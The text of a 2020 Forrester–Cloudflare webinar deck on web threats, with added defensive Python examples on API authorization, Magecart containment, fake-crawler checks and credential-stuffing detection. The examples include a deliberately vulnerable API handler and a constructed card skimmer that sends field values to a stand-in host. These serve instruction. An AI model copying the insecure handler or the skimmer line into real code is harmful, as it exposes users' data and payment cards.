Cybersecurity 2020 Threat Landscape and its Implications (AMER)
Featuring Guest Speaker from Forrester
Today’s Speakers
Guest Speaker: Sandy Carielli, Principal Analyst, Forrester
Arun Singh, Product Marketing Lead, Security, Cloudflare
Agenda
1. Security Threat Trends and Implications
2. Recommendations and Solutions
3. Q&A
Cloudflare Introduction
Cloudflare is an intelligent, integrated global cloud network that delivers security, performance, and reliability for all your Internet infrastructure, people and connected devices.
CLOUDFLARE’S MISSION: Help build a better Internet
Confidential. Copyright © Cloudflare, Inc.
Help Build A Better Internet
● 27M+ Internet properties
● 37 Tbps of network capacity
● 200 cities in 95+ countries
● 45B cyber threats blocked each day in Q1 ’20
● 99% of the Internet-connected population in the developed world is located within 100 milliseconds of our network
Note: Map data as of Jan 15, 2020
Cybersecurity 2020 Threat
Landscape and its Implications
Sandy Carielli
Principal Analyst
© 2020 Forrester. Reproduction Prohibited.
33% of firms suffered a breach as a result of an external attack. This is how.
Some Of The Top Threats In 2020 Are Web App Based: Bots, APIs, Client-Side Attacks
Forrester Report: “Top Cybersecurity Threats In 2020”
The New Normal
Breaches Due To Improperly Secured APIs
Common Causes Were Poor Access Control and Unauthenticated API Endpoints
https://www.wired.com/story/i-scraped-millions-of-venmo-payments-your-data-is-at-risk/?verso=true
https://www.csoonline.com/article/3268025/panera-bread-blew-off-breach-report-for-8-months-leaked-millions-of-customer-records.html
https://www.theinquirer.net/inquirer/news/3066805/usps-data-breach-api-flaw
https://threatpost.com/t-mobile-alerts-2-3-million-customers-of-data-breach-tied-to-leaky-api/136896/
OWASP API Security Top 10 (release candidate): https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf
Client-Side Validation + Poor API Authorization = Data Leakage
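The two slides above reduce the API breaches to one pattern: the client decides which account it asks for, and the API trusts that decision. The following is an added example, not code from the deck or from Forrester or Cloudflare. It stands in for a transactions API with plain Python functions and constructed sessions and data; the handler names, the token strings and the choice to answer 404 rather than 403 for a foreign object are this example's own assumptions.

```python
"""
Added example (not from the deck): why client-side validation plus weak
API authorization leaks data, and what the server-side fix looks like.

All data below is constructed for illustration. The "API" is a pair of
plain functions standing in for HTTP handlers; a request is a dict with
headers and query parameters, and a response is (status, body).
"""
import hmac

# Constructed back-end state: bearer tokens issued at login, and each
# account's transaction history keyed by the owning user id.
SESSIONS = {
    "tok-alice-7f3a": "alice",
    "tok-bob-91c2": "bob",
}

TRANSACTIONS = {
    "alice": [{"id": 101, "to": "grocer", "amount": 42.10}],
    "bob": [{"id": 202, "to": "landlord", "amount": 1200.00}],
}


def get_transactions_vulnerable(request):
    """Broken object-level authorization (OWASP API1).

    The mobile client only ever sends its *own* user_id and hides other
    users' data, so the developer relied on that client-side validation.
    The server never checks who the caller is; anyone who changes the
    user_id parameter (or calls without logging in) reads another
    account's history.
    """
    user_id = request["query"].get("user_id")
    if user_id not in TRANSACTIONS:
        return 404, {"error": "not found"}
    return 200, TRANSACTIONS[user_id]


def authenticate(request):
    """Map a bearer token to a principal, or None if unauthenticated.

    Constant-time comparison avoids leaking token bytes through timing
    when the token store is small enough to scan.
    """
    auth = request["headers"].get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    presented = auth[len("Bearer "):]
    for token, principal in SESSIONS.items():
        if hmac.compare_digest(token, presented):
            return principal
    return None


def get_transactions_hardened(request):
    """Same endpoint with authentication and object-level authorization.

    1. Reject unauthenticated calls (the "unauthenticated API endpoint"
       cause on the previous slide).
    2. Derive the principal from the credential, never from a parameter.
    3. Authorize the object: a caller may only read their own account.
       Answering 404 instead of 403 avoids confirming that the other
       account id exists.
    """
    principal = authenticate(request)
    if principal is None:
        return 401, {"error": "authentication required"}
    requested = request["query"].get("user_id", principal)
    if requested != principal:
        return 404, {"error": "not found"}
    return 200, TRANSACTIONS.get(principal, [])


def make_request(token=None, user_id=None):
    """Build a constructed request; token=None means an anonymous call."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    query = {"user_id": user_id} if user_id else {}
    return {"headers": headers, "query": query}


if __name__ == "__main__":
    # Bob tampers with the user_id his client "validated" and reads Alice's data.
    print(get_transactions_vulnerable(make_request("tok-bob-91c2", "alice")))
    # The same tampering against the hardened endpoint is denied.
    print(get_transactions_hardened(make_request("tok-bob-91c2", "alice")))
    # Anonymous callers are rejected outright.
    print(get_transactions_hardened(make_request(None, "alice")))
```

The hardened handler ignores the client's `user_id` for authorization and uses it only to detect a mismatch; the authorization decision is made from the credential alone, which is the property the slide's formula says is missing.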
“Magecart Attacks Are A Supply Chain Problem”
Forrester Report: “Top Cybersecurity Threats In 2020”
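Magecart compromises a third-party script the page already loads, so the defence lives in what the page tells the browser to trust. As an added example (not from the deck or from Forrester or Cloudflare), the Python below computes the Subresource Integrity pin for a reviewed copy of a vendor script, shows the browser-side check failing on a skimmed copy, and builds a Content-Security-Policy that denies the skimmer an exfiltration path. The script bodies, host names and CSP directive choices are constructed assumptions.

```python
"""
Added example (not from the deck): two browser-enforced controls that
contain a Magecart-style supply-chain compromise of a third-party script.

- Subresource Integrity (SRI): the page pins the hash of the script it
  expects. If the CDN copy is altered, the browser refuses to run it.
- Content-Security-Policy (CSP): the page lists where scripts may load
  from and where the page may send data, so a skimmer that does run
  cannot exfiltrate card numbers to an arbitrary host.

The script bodies and host names below are constructed for illustration.
"""
import base64
import hashlib

# Constructed: the vendor's checkout widget as the site reviewed it.
REVIEWED_SCRIPT = b"window.checkout = function(f){ return submit(f); };\n"

# Constructed: the same file after an attacker appended a skimmer.
SKIMMED_SCRIPT = REVIEWED_SCRIPT + (
    b"document.querySelector('#card').addEventListener('change', e =>"
    b" fetch('https://stats-cdn.example/c?d=' + e.target.value));\n"
)


def sri_integrity(script: bytes, alg: str = "sha384") -> str:
    """Value for the <script integrity="..."> attribute: alg-base64(hash).

    Browsers accept sha256, sha384 and sha512; sha384 is the common choice.
    """
    if alg not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI only allows sha256, sha384 or sha512")
    digest = hashlib.new(alg, script).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def sri_check(fetched: bytes, integrity: str) -> bool:
    """What the browser does before executing a script with an integrity
    attribute: hash the bytes it actually received and compare. A single
    appended byte fails the check, so the skimmed copy never runs.
    """
    alg, _, expected = integrity.partition("-")
    try:
        return sri_integrity(fetched, alg) == f"{alg}-{expected}"
    except ValueError:
        return False


def script_tag(src: str, integrity: str) -> str:
    """Emit the pinned tag. crossorigin is required for SRI on cross-origin
    scripts; without it the browser cannot read the body to hash it."""
    return f'<script src="{src}" integrity="{integrity}" crossorigin="anonymous"></script>'


def csp_header(script_hosts, connect_hosts) -> str:
    """Build a Content-Security-Policy for a payment page.

    script-src limits where code may come from; connect-src and form-action
    limit where the page may send data, which is what a skimmer needs.
    Hosts are assumed to be bare origins such as https://pay.example.
    """
    directives = [
        "default-src 'none'",
        "script-src 'self' " + " ".join(script_hosts),
        "connect-src 'self' " + " ".join(connect_hosts),
        "form-action 'self' " + " ".join(connect_hosts),
        "img-src 'self'",
        "style-src 'self'",
        "frame-ancestors 'none'",
    ]
    return "; ".join(directives)


def csp_allows_connect(header: str, origin: str) -> bool:
    """Minimal check: would connect-src permit a fetch() to this origin?
    Real CSP matching also handles schemes, wildcards and 'self'; this
    illustrates the exact-origin case only."""
    for directive in header.split("; "):
        if directive.startswith("connect-src "):
            return origin in directive.split()[1:]
    return False


if __name__ == "__main__":
    pin = sri_integrity(REVIEWED_SCRIPT)
    print(script_tag("https://widgets.vendor.example/checkout.js", pin))
    print("reviewed copy runs:", sri_check(REVIEWED_SCRIPT, pin))
    print("skimmed copy runs: ", sri_check(SKIMMED_SCRIPT, pin))
    policy = csp_header(["https://widgets.vendor.example"], ["https://pay.example"])
    print(policy)
    print("skimmer can exfiltrate:", csp_allows_connect(policy, "https://stats-cdn.example"))
```

Pinning means a vendor update breaks the checkout page until the new hash is reviewed and redeployed; that friction is the control working, and it is why the recommendation later in the deck pairs "protect client-side code" with automation. SRI covers only scripts the page references by URL, so a pinned script that loads further scripts at runtime is governed by CSP alone.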
Increases in global Internet utilization
Italy
● National quarantine ordered on March 9th, 2020
● 20% increase in utilization
Global Trends
● Global increases in traffic in all regions
● Japan and India continue to see increases after a temporary decline in late March
Categorical increases
● 250% increase in websites related to kids’ activities
● Over 100% increase in the top 5 categories
Event-related traffic declines
● Up to 50% decline in traffic at sporting event sites
● Travel sites experiencing similar declines
Rising security concerns
Hospital websites
● Almost 2x increase in attacks in March and April
Cyberattacks against society
● The category with the biggest increase in cyberattacks was Advocacy Groups, with a staggering increase of 1,120x.
● Since the murder of George Floyd there has also been a large increase in attacks on US government websites.
Q1 DDoS Trends
● In Q1 2020, 92% of the attacks were under 10 Gbps, compared to 84% in Q4 2019
Q1 DDoS Trends
● The majority of the attacks peaked below 1 million packets per second (pps).
Q1 DDoS Trends
● 79% of DDoS attacks in Q1 lasted between 30 and 60 minutes, compared to 60% in Q4, an increase of 19 percentage points.
Late March events
● Largest attack mitigated: 550 Gbps
● 55% increase in number of attacks (compared to first half)
29
Late March events
● Largest attack mitigated (550
Gbps)
● 55% increase in number of
attacks (compared to first
half)
30
Application-level attacks
● The United States accounted for the largest number of application-level attacks that Cloudflare blocked
Top 4 application attack vectors
● Command Injection
● SQL injection
● File Inclusion
● Fake search engine crawler
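The fourth vector on this slide is the one of the four that is not a payload problem: a User-Agent string is free text, so a bot that calls itself Googlebot sails past allow-lists and crawler rate exemptions. Google and Microsoft both document the check that holds up, reverse DNS on the source IP followed by a forward lookup that must map back to the same IP. The Python below is an added example (not from the deck or from Forrester or Cloudflare) that applies that check to constructed access-log lines; the DNS tables, addresses and log format are constructed so it runs offline.

```python
"""
Added example (not from the deck): separating a real search-engine crawler
from a "fake search engine crawler", the fourth vector on the slide above.

The User-Agent is free text, so bots set it to Googlebot to pass allow-lists.
Google and Microsoft document the check that holds up: reverse-resolve the
source IP, require the hostname to sit in the engine's domain, then
forward-resolve that hostname and require it to map back to the same IP.
The DNS tables below are constructed so this runs offline; for live traffic
pass reverse=lambda ip: socket.gethostbyaddr(ip)[0] and
forward=lambda h: socket.gethostbyname_ex(h)[2] (with error handling).
"""

# Documented crawler hostname suffixes per engine.
CRAWLER_DOMAINS = {
    "googlebot": ("googlebot.com", "google.com"),
    "bingbot": ("search.msn.com",),
}

# Constructed PTR and A records. 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges, not real crawler addresses.
PTR = {
    "203.0.113.10": "crawl-203-0-113-10.googlebot.com",   # genuine crawler
    "203.0.113.20": "vps-20.cheaphost.example",           # UA spoofed only
    "203.0.113.30": "crawl-203-0-113-30.googlebot.com",   # PTR spoofed too
    "198.51.100.5": "msnbot-198-51-100-5.search.msn.com",
}
FORWARD = {
    "crawl-203-0-113-10.googlebot.com": ["203.0.113.10"],
    "vps-20.cheaphost.example": ["203.0.113.20"],
    # The attacker controls the PTR for .30 but not the googlebot.com zone,
    # so the forward lookup still points at Google's real crawler.
    "crawl-203-0-113-30.googlebot.com": ["203.0.113.10"],
    "msnbot-198-51-100-5.search.msn.com": ["198.51.100.5"],
}


def reverse_lookup_offline(ip):
    return PTR.get(ip)


def forward_lookup_offline(host):
    return FORWARD.get(host, [])


def claimed_crawler(user_agent):
    """Which engine the UA claims to be, or None for ordinary traffic."""
    ua = user_agent.lower()
    for name in CRAWLER_DOMAINS:
        if name in ua:
            return name
    return None


def verify_crawler(ip, user_agent, reverse=reverse_lookup_offline,
                   forward=forward_lookup_offline):
    """Return (verdict, reason); verdict is 'not-a-crawler', 'verified' or 'fake'."""
    engine = claimed_crawler(user_agent)
    if engine is None:
        return "not-a-crawler", "no crawler claim in User-Agent"
    host = reverse(ip)
    if not host:
        return "fake", "no PTR record for source IP"
    host = host.rstrip(".").lower()
    if not any(host == d or host.endswith("." + d) for d in CRAWLER_DOMAINS[engine]):
        return "fake", f"PTR {host} is outside the {engine} domains"
    if ip not in forward(host):
        return "fake", f"forward lookup of {host} does not return {ip}"
    return "verified", f"{host} round-trips to {ip}"


def triage_log(lines, **resolvers):
    """Run verify_crawler over constructed access-log lines of the form
    '<ip> "<user-agent>"' and return [(ip, verdict), ...]."""
    out = []
    for line in lines:
        ip, _, rest = line.partition(" ")
        ua = rest.strip().strip('"')
        out.append((ip, verify_crawler(ip, ua, **resolvers)[0]))
    return out


SAMPLE_LOG = [  # constructed
    '203.0.113.10 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.20 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.30 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.5 "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
    '203.0.113.20 "Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0"',
]

if __name__ == "__main__":
    for ip, verdict in triage_log(SAMPLE_LOG):
        print(ip, verdict)
```

The third sample line is the case a PTR-only check misses: anyone who controls reverse DNS for their own address range can name it `crawl-...googlebot.com`, but they cannot make Google's zone resolve that name back to their address, so the forward step is what makes the verdict trustworthy.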
“Bad bots comprise about 20% of all web traffic.”
- “Top Cybersecurity Threats In 2020,” Forrester Report
The Many Flavors Of Bad Bots
● Web scraping
● Credential stuffing
● Checkout abuse
● Inventory hoarding
● Card fraud
● Web recon
● Ad fraud
● DDoS
● Business logic
● Influence fraud
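Credential stuffing, one of the flavours listed above, has a log signature that is easy to state: one source, many different accounts, mostly failures, in a short window, whereas a forgetful human retries one account a few times. The detector below is an added example (not from the deck or from Forrester or Cloudflare) that scores each source over a sliding window on those properties; the log format, sample lines, window and thresholds are constructed for illustration and need tuning against your own baseline.

```python
"""
Added example (not from the deck): detecting credential stuffing, one of
the bad-bot flavours listed above, from authentication logs.

Credential stuffing replays leaked username/password pairs, so one source
tries many *different* accounts, most attempts fail, and it happens fast.
The detector scores each source IP over a sliding window on those three
properties. Log lines and thresholds are constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime

# Constructed log format: "<ISO timestamp> <ip> <username> <ok|fail>"
SAMPLE_LOG = """\
2020-06-10T12:00:00 203.0.113.7 alice fail
2020-06-10T12:00:01 203.0.113.7 bob fail
2020-06-10T12:00:01 203.0.113.7 carol fail
2020-06-10T12:00:02 203.0.113.7 dave ok
2020-06-10T12:00:02 203.0.113.7 erin fail
2020-06-10T12:00:03 203.0.113.7 frank fail
2020-06-10T12:00:03 203.0.113.7 grace fail
2020-06-10T12:00:04 203.0.113.7 heidi fail
2020-06-10T12:00:10 198.51.100.9 mallory fail
2020-06-10T12:00:25 198.51.100.9 mallory fail
2020-06-10T12:00:40 198.51.100.9 mallory ok
2020-06-10T12:05:00 203.0.113.7 ivan fail
"""

# Constructed thresholds; a real deployment derives these from its baseline.
WINDOW_SECONDS = 60
MIN_ATTEMPTS = 6
MIN_DISTINCT_USERS = 5
MIN_FAILURE_RATE = 0.7


def parse(line):
    """Split one log line into (timestamp, ip, username, succeeded)."""
    ts, ip, user, outcome = line.split()
    return datetime.fromisoformat(ts), ip, user, outcome == "ok"


def detect_stuffing(log_text, window=WINDOW_SECONDS, min_attempts=MIN_ATTEMPTS,
                    min_users=MIN_DISTINCT_USERS, min_fail=MIN_FAILURE_RATE):
    """Return {ip: first alert} for sources that look like stuffing.

    Each source keeps a deque of recent attempts; entries older than the
    window are evicted before scoring, so the check is O(1) amortized per
    line and works on a live stream as well as a file.
    """
    recent = defaultdict(deque)
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, ok = parse(line)
        q = recent[ip]
        q.append((ts, user, ok))
        while (ts - q[0][0]).total_seconds() > window:
            q.popleft()
        attempts = len(q)
        distinct = len({u for _, u, _ in q})
        failures = sum(1 for _, _, o in q if not o)
        if (attempts >= min_attempts and distinct >= min_users
                and failures / attempts >= min_fail and ip not in alerts):
            alerts[ip] = {
                "at": ts.isoformat(),
                "attempts": attempts,
                "distinct_users": distinct,
                "failure_rate": round(failures / attempts, 2),
                # Accounts that *succeeded* inside the burst are the ones
                # whose leaked passwords worked: reset those first.
                "compromised": sorted(u for _, u, o in q if o),
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_stuffing(SAMPLE_LOG).items():
        print(ip, alert)
```

The single-account retries from 198.51.100.9 never trip the distinct-user threshold, which is what keeps the false positive rate down; the successful login buried inside the burst from 203.0.113.7 is reported separately because it is the account that actually needs a password reset.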
Bot Attacks Impact a Wider Range Of Personas
● Security
● Marketing
● Fraud
● eCommerce
● Customer Experience
Online Shoe Retailer
Valuable inventory was hoarded, damaging the brand and reducing revenue
● Premium limited-release inventory was being purchased and “hoarded” by bots
● Approx. 75% of all traffic came from bots
● Resulted in high infrastructure costs
● Created ill will among customers
● Cloudflare solved this with a 0.1% false positive rate
From Sneakers To Toilet Paper: What Is “Valuable?”
The New Normal
Collaborate And Automate
“Siloed teams perform even worse when everything is remote. The friction of work handoffs is further compounded by distance.”
- “Agile, DevOps, And COVID-19,” Forrester Blog
Recommendations
• Enumerate, manage and protect API assets … and don’t trust client-side data!
• Protect client-side code
• Use bot management tooling to change the economics of bot attacks
• Consider how the “new normal” changes how attackers might target your products or services
• Invest in automation – but make sure your automations are built on solid processes
• Focus on CI/CD integrations and collaboration in remote work situations
Thank you!

Q&A
